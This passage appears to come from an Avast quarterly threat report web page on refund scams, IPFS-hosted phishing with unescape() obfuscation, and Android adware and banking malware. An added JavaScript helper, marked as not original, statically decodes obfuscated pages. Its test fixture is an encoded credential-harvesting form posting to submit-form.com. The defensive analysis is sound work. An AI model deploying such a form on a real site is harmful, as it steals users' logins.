  6214. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/23_Refund_scam_daily_hits-1024x404.png" alt="" class="wp-image-7872" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/23_Refund_scam_daily_hits-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/23_Refund_scam_daily_hits-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/23_Refund_scam_daily_hits-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/23_Refund_scam_daily_hits-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/23_Refund_scam_daily_hits-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Refund and Invoice Scam in Q2/2023 and Q3/2023</em></figcaption></figure></div>
  6215.  
  6216.  
  6217. <p>In this quarterly report, we have chosen to spotlight a sample prevalent predominantly in Australia, as that country experienced a nearly 30% increase compared to the previous period. This example was selected because it demonstrates many features increasingly noticeable in various other types of scams. The points we mention should improve your ability to spot similar scams. Below is a breakdown of this deceitful email:</p>
  6218.  
  6219.  
  6220. <div class="wp-block-image">
  6221. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="603" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/24_Refund_scam_Norton_example-603x1024.png" alt="" class="wp-image-7873" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/24_Refund_scam_Norton_example-603x1024.png 603w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/24_Refund_scam_Norton_example-177x300.png 177w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/24_Refund_scam_Norton_example.png 670w" sizes="(max-width: 603px) 100vw, 603px" /><figcaption class="wp-element-caption"><em>Example of a Refund and Invoice Scam seen in Q3/2023</em></figcaption></figure></div>
  6222.  
  6223.  
  6224. <p>This scam email contains a few typical scam traits:&nbsp;</p>
  6225.  
  6226.  
  6227.  
  6228. <ul>
  6229. <li><strong>Attention-Grabbing Subject Line</strong>: &#8220;Dark Web Discovery: Your 30 Photos and 5 Emails Exposed!&#8221; By creating a sense of immediate danger, the sender aims to provoke curiosity and urgency.&nbsp;</li>
  6230.  
  6231.  
  6232.  
  6233. <li><strong>Impersonation of a Legitimate Entity</strong>: The email is supposedly from a &#8220;Support Team&#8221;, which sounds official and trustworthy. However, the domain &#8216;<a href="mailto:@canadialect.com" target="_blank" rel="noreferrer noopener">@canadialect.com</a>&#8216; raises eyebrows. Always double-check the authenticity of the domain.&nbsp;</li>
  6234.  
  6235.  
  6236.  
  6237. <li><strong>Urgency and Fear</strong>: The email highlights that the recipient&#8217;s &#8220;subscription has expired,&#8221; implying prior engagement or services with them. It also claims a discovery of personal photos and email addresses on the Dark Web.&nbsp;</li>
  6238.  
  6239.  
  6240.  
  6241. <li><strong>Detailed Alarming Findings</strong>: The message dives deeper into the &#8216;findings&#8217;, mentioning &#8220;30 photos of you&#8221; and &#8220;2 email addresses&#8221; associated with the recipient found in dark web forums. Providing specifics makes the scam seem more credible.&nbsp;</li>
  6242.  
  6243.  
  6244.  
  6245. <li><strong>A Tempting Offer</strong>: Following the alarming statements, there is a solution offered – a &#8220;(80%) renewal discount Today&#8221; on their service. This discount plays on the human tendency to seek quick resolutions when faced with threats.&nbsp;</li>
  6246.  
  6247.  
  6248.  
  6249. <li><strong>Clear Call to Action</strong>: The bold &#8220;Renew Now!&#8221; button at the end of the email serves as a clear directive for the panicked reader. Clicking on such links often leads to phishing sites or direct financial scams.&nbsp;</li>
  6250. </ul>
  6251.  
  6252.  
  6253.  
  6254. <p>As a parting word of advice, always be skeptical of unsolicited emails, especially those that invoke fear and urgency. Verify claims independently and avoid clicking on links or downloading attachments from unknown senders.&nbsp;</p>
  6255.  
  6256.  
  6257.  
  6258. <h3 class="wp-block-heading">Phishing&nbsp;</h3>
  6259.  
  6260.  
  6261.  
  6262. <p><em>Phishing is a type of online scam where fraudsters attempt to obtain sensitive information including passwords or credit card details by posing as a trustworthy entity in an electronic communication, such as an email, text message, or instant message. The fraudulent message usually contains a link to a fake website that looks like the real one, where the victim is asked to enter their sensitive information.</em>&nbsp;</p>
  6263.  
  6264.  
  6265.  
  6266. <p>In the Q2/2023 Threat Report, we pointed out that phishing activity was picking up. Now we can confirm that our estimate was correct: after a dip in mid-July, a wave of new samples arrived in August, which shows as a big jump on the chart.&nbsp;</p>
  6267.  
  6268.  
  6269.  
  6270. <p>The following graph illustrates the activity of phishing threats across two quarters.&nbsp;</p>
  6271.  
  6272.  
  6273. <div class="wp-block-image">
  6274. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/25_Phishing_daily_hits-1024x404.png" alt="" class="wp-image-7874" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/25_Phishing_daily_hits-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/25_Phishing_daily_hits-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/25_Phishing_daily_hits-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/25_Phishing_daily_hits-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/25_Phishing_daily_hits-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Risk ratio for Q2-Q3/2023 of phishing threats</em></figcaption></figure></div>
  6275.  
  6276.  
  6277. <p>Furthermore, we have observed an emerging trend in phishing delivery methods. Over the past few months, there has been a notable uptick in the use of InterPlanetary File System (IPFS) to disseminate phishing content. This decentralized protocol, designed for storing and sharing files, has become an attractive avenue for cybercriminals.</p>
  6278.  
  6279.  
  6280. <div class="wp-block-image">
  6281. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/26_Phishing_IPFS_daily_hits-1024x404.png" alt="" class="wp-image-7875" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/26_Phishing_IPFS_daily_hits-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/26_Phishing_IPFS_daily_hits-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/26_Phishing_IPFS_daily_hits-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/26_Phishing_IPFS_daily_hits-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/26_Phishing_IPFS_daily_hits-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>IPFS-based attacks and the related risk ratio in Q3/2023</em></figcaption></figure></div>
  6282.  
  6283.  
  6284. <p>In addition to IPFS, we have also witnessed cybercriminals turning to the CAR file format, which poses a unique challenge for traditional HTML scanners and may allow the content to bypass detection. The preference among attackers for such hosting methods can be attributed to their ease of deployment and the added complexity of takedown procedures, which together provide an advantageous environment for malicious activities.</p>
  6285.  
  6286.  
  6287. <div class="wp-block-image">
  6288. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="541" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/27_Phishing_IPFS_example-1024x541.png" alt="" class="wp-image-7876" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/27_Phishing_IPFS_example-1024x541.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/27_Phishing_IPFS_example-300x158.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/27_Phishing_IPFS_example-768x405.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/27_Phishing_IPFS_example.png 1254w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Example of a phishing page using IPFS</em></figcaption></figure></div>
  6289.  
  6290.  
  6291. <p>Campaigns running on IPFS infrastructure quite often use some type of obfuscation. In most cases these are very basic techniques, and deobfuscating them is simple.&nbsp;</p>
  6292.  
  6293.  
  6294.  
  6295. <p>In this common example, you can see that the HTML code itself has been encoded to make it unreadable, and the JavaScript function unescape() is used to decode it at runtime. Although this function is deprecated and its use is not recommended, it often appears in IPFS samples.&nbsp;</p>
  6296.  
  6297.  
  6298. <div class="wp-block-image">
  6299. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="528" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/28_Phishing_obfuscated_example-1024x528.png" alt="" class="wp-image-7877" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/28_Phishing_obfuscated_example-1024x528.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/28_Phishing_obfuscated_example-300x155.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/28_Phishing_obfuscated_example-768x396.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/28_Phishing_obfuscated_example-1536x791.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/28_Phishing_obfuscated_example.png 1539w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Source code is typically obfuscated</figcaption></figure></div>
  6300.  
  6301.  
  6302. <p>In the decoded HTML source code, you can see that the scammers use a submit-form.com endpoint to collect the submitted credentials.</p>
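<p>The deobfuscation step described above, as an added example that is not part of the original report: a small triage helper that finds string payloads passed to <code>unescape()</code> in a page, decodes them without executing any script, and reports the form action targets found in the decoded markup together with whether a password field is present. The sample page, the gateway origin <code>https://gateway.example/</code> and the form path <code>xxxxxxxx</code> under submit-form.com are constructed for the example.</p>

```javascript
// Added example, not code from the Avast report. Static triage of an HTML page
// whose real markup is hidden behind unescape("%3C...") so that an analyst can
// see where a phishing form posts credentials without rendering the page.

// Constructed sample modelled on the pattern described in the report: the whole
// form is percent-encoded and written out with document.write(unescape(...)).
// The gateway origin and the form path are placeholders, not real values.
const GATEWAY_ORIGIN = 'https://gateway.example/ipfs/PLACEHOLDER';
const SAMPLE_PAGE =
  '<html><body><script>document.write(unescape(\'' +
  '%3Cform%20action%3D%22https%3A%2F%2Fsubmit-form.com%2Fxxxxxxxx%22%20method%3D%22post%22%3E' +
  '%3Cinput%20name%3D%22email%22%3E%3Cinput%20type%3D%22password%22%20name%3D%22pass%22%3E' +
  '%3C%2Fform%3E\'))</script></body></html>';

// Mirrors what the deprecated global unescape() does: %XX and %uXXXX sequences
// become characters, anything else passes through unchanged. Reimplemented so
// the analysis never calls the deprecated function or evaluates page script.
function legacyUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_m, u, h) => String.fromCharCode(parseInt(u !== undefined ? u : h, 16)));
}

// Collect every string literal handed directly to unescape(...).
function findUnescapePayloads(html) {
  const re = /unescape\(\s*(['"])([^'"]*)\1\s*\)/g;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[2]);
  return out;
}

// Collect <form action="..."> targets from a piece of markup.
function findFormActions(html) {
  const re = /<form\b[^>]*\baction\s*=\s*(['"]?)([^'"\s>]+)\1/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[2]);
  return out;
}

// Decode the hidden payloads and compare form targets before and after
// decoding. A page that only reveals a password form after decoding, and posts
// it to a host other than the one serving the page, is flagged as suspicious.
function triagePage(html, pageOrigin) {
  const payloads = findUnescapePayloads(html);
  const decoded = payloads.map(legacyUnescape).join('\n');
  const visibleActions = findFormActions(html);
  const hiddenActions = findFormActions(decoded);
  const pageHost = new URL(pageOrigin).host;
  const externalHosts = [...new Set(
    hiddenActions
      .map((a) => new URL(a, pageOrigin).host)
      .filter((h) => h !== pageHost),
  )];
  const asksForPassword = /type\s*=\s*["']?password/i.test(decoded);
  return {
    usesUnescape: payloads.length > 0,
    decoded,
    visibleActions,
    hiddenActions,
    externalHosts,
    suspicious: payloads.length > 0 && asksForPassword && externalHosts.length > 0,
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(triagePage(SAMPLE_PAGE, GATEWAY_ORIGIN), null, 2));
}
```

<p>Running the helper on the constructed sample reports no visible form in the raw page, one hidden form after decoding, and <code>submit-form.com</code> as an external target, which is the signal a scanner that only inspects the raw HTML would miss.</p>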
  6303.  
  6304.  
  6305. <div class="wp-block-image">
  6306. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="273" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/29_Phishing_deobfuscated_example-1024x273.png" alt="" class="wp-image-7878" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/29_Phishing_deobfuscated_example-1024x273.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/29_Phishing_deobfuscated_example-300x80.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/29_Phishing_deobfuscated_example-768x205.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/29_Phishing_deobfuscated_example.png 1392w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Deobfuscated source code of IPFS phishing sample</em></figcaption></figure></div>
  6307.  
  6308.  
  6309. <p>Analyzing the data for Q3/2023, Argentina, Brazil, Mexico, and Spain are the countries with a significant Q/Q increase in risk ratio for phishing. The countries with the highest overall risk ratio are Macao with 19.47%, Angola with 13.14% and Pakistan with a risk ratio of 12.8%.</p>
  6310.  
  6311.  
  6312. <div class="wp-block-image">
  6313. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/30_Phishing_heatmap-1024x639.png" alt="" class="wp-image-7879" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/30_Phishing_heatmap-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/30_Phishing_heatmap-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/30_Phishing_heatmap-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/30_Phishing_heatmap-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/30_Phishing_heatmap-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio of phishing in Q3/2023</em></figcaption></figure></div>
  6314.  
  6315.  
  6316. <p>Phishing has long been the classic and primary way to steal valuable data from users. A growing trend points out that although this is a relatively old method, it is far from being obsolete.</p>
  6317.  
  6318.  
  6319.  
  6320. <p class="has-text-align-right"><em>Alexej Savčin, Malware Analyst<br>Martin Chlumecký,&nbsp;Malware Researcher<br>Branislav Kramár,&nbsp;Malware Analyst<br>Bohumír Fajt, Malware Analysis Team Lead<br>Jan Rubín, Malware Researcher</em></p>
  6321.  
  6322.  
  6323.  
  6324. <h2 class="wp-block-heading">Mobile-Related Threats&nbsp;</h2>
  6325.  
  6326.  
  6327.  
  6328. <p>Another quarter, another set of varied and interesting developments hitting the mobile threat landscape. Related to the escalating situation between Israel and Palestine, spyware mimicking a missile warning application used in Israel aims to steal victim data. Also of note is the Xenomorph banker, which has added new features and is spreading alongside a Windows info-stealer.&nbsp;&nbsp;</p>
  6329.  
  6330.  
  6331.  
  6332. <p>A new strain of Invisible Adware displays and clicks on adverts while the device screen is off, raking in fraudulent ad revenue and draining victim’s batteries and data allowances. We also observed several new versions of SpyNote this quarter, with one breaching the border between spyware and banker malware.&nbsp;</p>
  6333.  
  6334.  
  6335.  
  6336. <p>Popular messenger application mods such as Telegram, Signal and WhatsApp continue to be abused to serve spyware. And finally, SpyLoans continue to spread on PlayStore and threaten vulnerable victims with extortion.&nbsp;</p>
  6337.  
  6338.  
  6339.  
  6340. <h3 class="wp-block-heading">Web-Threats Data in the Mobile Landscape&nbsp;</h3>
  6341.  
  6342.  
  6343.  
  6344. <p>Like on Desktop, we have introduced web-threat related data into our mobile threat report this quarter. This added data reflects a re-shuffle of the most prevalent threats facing mobile users today. As evidenced by the graphic below, scams, phishing and malvertising are responsible for the majority of blocked attacks on mobile.</p>
  6345.  
  6346.  
  6347. <div class="wp-block-image">
  6348. <figure class="aligncenter size-large"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Mobile-Threats-Stats-Breakdown.png"><img loading="lazy" decoding="async" width="1024" height="436" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Mobile-Threats-Stats-Breakdown-1024x436.png" alt="" class="wp-image-7791" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Mobile-Threats-Stats-Breakdown-1024x436.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Mobile-Threats-Stats-Breakdown-300x128.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Mobile-Threats-Stats-Breakdown-768x327.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Q3-Avast-Mobile-Threats-Stats-Breakdown.png 1195w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><figcaption class="wp-element-caption"><em>Graphs showing the most prevalent threats in the mobile sphere in Q3/2023</em>&nbsp;</figcaption></figure></div>
  6349.  
  6350.  
  6351. <p>It makes sense that web-based threats will account for the majority of blocked attacks on mobile as well as desktop. With any malicious app on Android, user action is required to install it and, in most cases, the malware requires the user to enable some permissions for it to activate its malicious functionality. Contrary to this, web-based scams, phishing and malvertising can be encountered through normal browsing activity which most mobile users do every day. These web threats may also be contained in private messages, email, SMS, and others.&nbsp;</p>
  6352.  
  6353.  
  6354.  
  6355. <h3 class="wp-block-heading">Adware Becomes Nearly Invisible&nbsp;</h3>
  6356.  
  6357.  
  6358.  
  6359. <p><em>Adware threats on mobile phones refer to applications that display intrusive out-of-context adverts to users with the intent of gathering fraudulent advertising revenue. This malicious functionality is often delayed until sometime after installation and coupled with stealthy features such as hiding the adware app icon to prevent removal. Adware mimics popular apps such as games, camera filters, and wallpaper apps, to name a few.</em>&nbsp;</p>
  6360.  
  6361.  
  6362.  
  6363. <p>Despite the addition of web threats data, adware remains one of the most prevalent threats on mobile and retains its top spot among traditional malware apps. Serving intrusive advertisements to its victims with the intent of gathering fraudulent ad revenue, these apps pose a danger and annoyance to both users and advertisers alike.&nbsp;</p>
  6364.  
  6365.  
  6366.  
  6367. <p>At the top of the adware list is HiddenAds, followed by the MobiDash and FakeAdBlock strains. While both MobiDash and FakeAdBlock have seen an over 40% decrease in protected users, HiddenAds is on the rise again with a bump of 15% in protected users. All three strains share some features, such as hiding their icon and displaying out-of-context full screen ads that annoy victims. HiddenAds has historically relied on the PlayStore as a mode of spread, while the others generally rely on 3<sup>rd</sup> party app stores, malicious redirects, and advertisements. Of note is a recent addition to the stealth features of these adware apps: once installed, they display a fake error stating that the app is not available in the victim’s region or country, together with an ‘installation failed’ message. Coupled with hiding its icon, the adware conducts its malicious behavior in the background while the victim remains unaware of the source of the fraudulent ads.</p>
  6368.  
  6369.  
  6370. <div class="wp-block-image">
  6371. <figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="733" height="495" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-Fake-error-message.jpg" alt="" class="wp-image-7792" style="width:417px;height:auto" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-Fake-error-message.jpg 733w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-Fake-error-message-300x203.jpg 300w" sizes="(max-width: 733px) 100vw, 733px" /><figcaption class="wp-element-caption"><em>MobiDash adware tries to trick its victim by displaying a fake error message after install </em>&nbsp;</figcaption></figure></div>
  6372.  
  6373.  
  6374. <p>This quarter a new batch of adware dubbed <a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/invisible-adware-unveiling-ad-fraud-targeting-android-users/" target="_blank" rel="noreferrer noopener">Invisible Adware</a> has snuck onto the PlayStore and gathered over two million downloads. True to their name, these applications try to display advertisements while the device screen is off. In essence, the victim would be unaware their phone is displaying ads while the malicious actors gather revenue through fake clicks and ad views. However, this will likely impact the device battery and potentially incur data charges, while at the same time contributing to ad fraud. The applications request permissions to run in the background and to ignore battery optimization in order to conduct their activity. While the observed behavior is that of ad fraud, there is also potential for installing other malware or visiting malicious websites.&nbsp;&nbsp;</p>
  6375.  
  6376.  
  6377.  
  6378. <p>The average daily protected users slightly increased when compared to last quarter. MobiDash and FakeAdBlock strains have gone down while HiddenAds continue to increase in popularity. Another campaign on PlayStore contributes to the steady numbers this quarter.&nbsp;</p>
  6379.  
  6380.  
  6381.  
  6382. <p>Brazil, India, and Argentina are again at the top of the countries with the most users affected by adware this quarter. Argentina saw a 14% increase in monthly affected users. India, Indonesia, and Paraguay have the highest risk ratio this quarter, meaning users in these countries are most likely to encounter adware.</p>
  6383.  
  6384.  
  6385. <div class="wp-block-image">
  6386. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-Adware-Risk-ratio-map-1024x639.png" alt="" class="wp-image-7793" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-Adware-Risk-ratio-map-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-Adware-Risk-ratio-map-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-Adware-Risk-ratio-map-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-Adware-Risk-ratio-map-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-Adware-Risk-ratio-map-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio for mobile adware in Q3/2023</em>&nbsp;&nbsp;</figcaption></figure></div>
  6387.  
  6388.  
  6389. <h3 class="wp-block-heading">Bankers Welcome SpyNote into the Fold&nbsp;</h3>
  6390.  
  6391.  
  6392.  
  6393. <p><em>Bankers are a sophisticated type of mobile malware that targets banking details, cryptocurrency wallets, and instant payments with the intent of extracting money. Generally distributed through phishing messages or fake websites, Bankers can take over a victim&#8217;s device by abusing the accessibility service. Once installed and enabled, they often monitor 2FA SMS messages and may display fake bank overlays to steal login information.</em>&nbsp;</p>
  6394.  
  6395.  
  6396.  
  6397. <p>Banker evolution continues this quarter with several new strains alongside updates to existing ones. Xenomorph makes a return with some new features, GoldDigger makes an entrance and SpyNote breaches the divide between spyware and bankers. Despite the new arrivals and updates, bankers overall have been on a steady decline in terms of protected users in our telemetry for the last few quarters. Cerberus/Alien maintains its top spot this quarter, trailed by Coper and Hydra strains. We observe an over 20% decrease in monthly average protected users this quarter on all top three banker strains.&nbsp;</p>
  6398.  
  6399.  
  6400.  
  6401. <p><a href="https://www.threatfabric.com/blogs/xenomorph" target="_blank" rel="noreferrer noopener">Xenomorph</a> is back after a few months’ hiatus and has evolved again with several added features and a new method of spread. It appears that this new campaign mainly targets bank users in Spain, the US and Portugal, and adds crypto wallets to its repertoire. Using tailored phishing websites disguised as Chrome updates, Xenomorph tricks victims into downloading its malicious APK. Once installed, it uses the accessibility service to take over the device, monitoring 2FA messages, and can display hundreds of fake bank overlays to its victim to steal login credentials. New features include keeping the device awake, a mimic mode that disguises the malware further and hides its icon, and lastly the ability to click anywhere on the device’s screen. Interestingly, Xenomorph was observed being served alongside RisePro, a Windows-based info stealer that also targets banking details and crypto wallets. This may point to a coordinated effort between various actors or a single actor behind multiple strains of malware.&nbsp;</p>
  6402.  
  6403.  
  6404. <div class="wp-block-image">
  6405. <figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="655" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-Xenomorph-requesting-Accessibility-permissions-655x1024.jpg" alt="" class="wp-image-7794" style="width:420px;height:auto" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-Xenomorph-requesting-Accessibility-permissions-655x1024.jpg 655w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-Xenomorph-requesting-Accessibility-permissions-192x300.jpg 192w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-Xenomorph-requesting-Accessibility-permissions-768x1201.jpg 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-Xenomorph-requesting-Accessibility-permissions-982x1536.jpg 982w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-Xenomorph-requesting-Accessibility-permissions.jpg 1078w" sizes="(max-width: 655px) 100vw, 655px" /><figcaption class="wp-element-caption"><em>A ‘tooltip’ displayed to the victims of Xenomorph once it is installed on the device</em>&nbsp;</figcaption></figure></div>
  6406.  
  6407.  
  6408. <p>A banker targeting victims in Vietnam pretending to be a government portal or a local energy company has been discovered and codenamed <a href="https://www.group-ib.com/blog/golddigger-fraud-matrix/" target="_blank" rel="noreferrer noopener">GoldDigger</a>. It uses Virbox Protector, a publicly available software that can obfuscate code and prevent both dynamic and static analysis. This appears to be a growing trend in Southeast Asia in recent years, as the use of advanced obfuscation can mean the malware goes undetected for longer. GoldDigger uses fake websites that imitate the PlayStore or phishing in private messages to spread itself. Once on the device, it can steal 2FA SMS as well as personal information and banking credentials.&nbsp;</p>
  6409.  
  6410.  
  6411. <div class="wp-block-image">
  6412. <figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="576" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-GoldDigger-banker-fake-splash-screen-576x1024.jpg" alt="" class="wp-image-7795" style="width:420px" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-GoldDigger-banker-fake-splash-screen-576x1024.jpg 576w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-GoldDigger-banker-fake-splash-screen-169x300.jpg 169w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-GoldDigger-banker-fake-splash-screen-768x1365.jpg 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-GoldDigger-banker-fake-splash-screen-864x1536.jpg 864w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-GoldDigger-banker-fake-splash-screen.jpg 1080w" sizes="(max-width: 576px) 100vw, 576px" /><figcaption class="wp-element-caption"><em>GoldDigger displays a fake splash screen to its victim (in Vietnamese), followed by a request to enable the Accessibility service</em>&nbsp;</figcaption></figure></div>
  6413.  
  6414.  
  6415. <p>In an unusual twist, <a href="https://www.cleafy.com/cleafy-labs/spynote-continues-to-attack-financial-institutions" target="_blank" rel="noreferrer noopener">SpyNote</a> has further evolved to the point of breaching into the banking sphere. Recent samples that we have observed are starting to use the spy features of this strain to extract 2FA messages as well as banking credentials and logins. Spreading through smishing and actual phone calls, victims are encouraged to update to the latest version of their banking application, which unfortunately is the SpyNote malware. This version of SpyNote uses the Accessibility service to keylog the victim’s entries, record the screen and extract confidential information. It also features a defense module intended to prevent its removal. As mentioned in previous quarterly reports, we are seeing more spyware strains being re-used in the banking sphere, and we anticipate this merging of strains will continue going forward.&nbsp;</p>
  6416.  
  6417.  
  6418. <div class="wp-block-image">
  6419. <figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="628" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3.-Spynote-fake-update-pop-up-628x1024.jpg" alt="" class="wp-image-7796" style="width:420px" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3.-Spynote-fake-update-pop-up-628x1024.jpg 628w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3.-Spynote-fake-update-pop-up-184x300.jpg 184w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3.-Spynote-fake-update-pop-up-768x1252.jpg 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3.-Spynote-fake-update-pop-up-942x1536.jpg 942w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3.-Spynote-fake-update-pop-up.jpg 1072w" sizes="(max-width: 628px) 100vw, 628px" /><figcaption class="wp-element-caption"><em>An unfinished SpyNote sample displays a fake update message that downloads further malicious APKs</em>&nbsp;</figcaption></figure></div>
  6420.  
  6421.  
  6422. <p>Despite continued activity, updated strains and new bankers entering the market, we observe a steady decline in attacked users for several quarters in a row. We estimate that this is due to threat actors using more tailored approaches as of late, as we observe fewer of the widespread SMS campaigns that were the signature of FluBot and others a few quarters ago.</p>
  6423.  
  6424.  
  6425. <div class="wp-block-image">
  6426. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Bankers-daily-hits-1024x404.png" alt="" class="wp-image-7797" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Bankers-daily-hits-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Bankers-daily-hits-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Bankers-daily-hits-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Bankers-daily-hits-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Bankers-daily-hits-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio of mobile bankers in Q4/2022-Q3/2023</em></figcaption></figure></div>
  6427.  
  6428.  
